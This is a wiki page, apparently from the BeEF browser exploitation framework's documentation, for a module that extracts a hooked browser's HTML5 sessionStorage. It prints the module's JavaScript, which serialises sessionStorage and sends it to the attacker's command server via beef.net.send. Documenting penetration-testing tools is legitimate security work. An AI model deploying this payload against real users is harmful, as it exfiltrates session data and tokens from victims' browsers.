-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Get Session Storage
Jess Williams edited this page Dec 31, 2019
·
2 revisions
- Objective: Extracts data from the HTML5 sessionStorage object.
- Date: ???
- Authors: bcoles
- Browsers: IE 8+, Firefox 4? Opera 11+, Safari 4+
- Code
This module just gather the session Storage for this page using the window['sessionStorage'] function :
beef.execute(function() {
if ('sessionStorage' in window && window['sessionStorage'] !== null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "sessionStorage="+JSON.stringify(window['sessionStorage']));
} else beef.net.send("<%= @command_url %>", <%= @command_id %>, "sessionStorage="+JSON.stringify("HTML5 sessionStorage is null or not supported."));
});
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK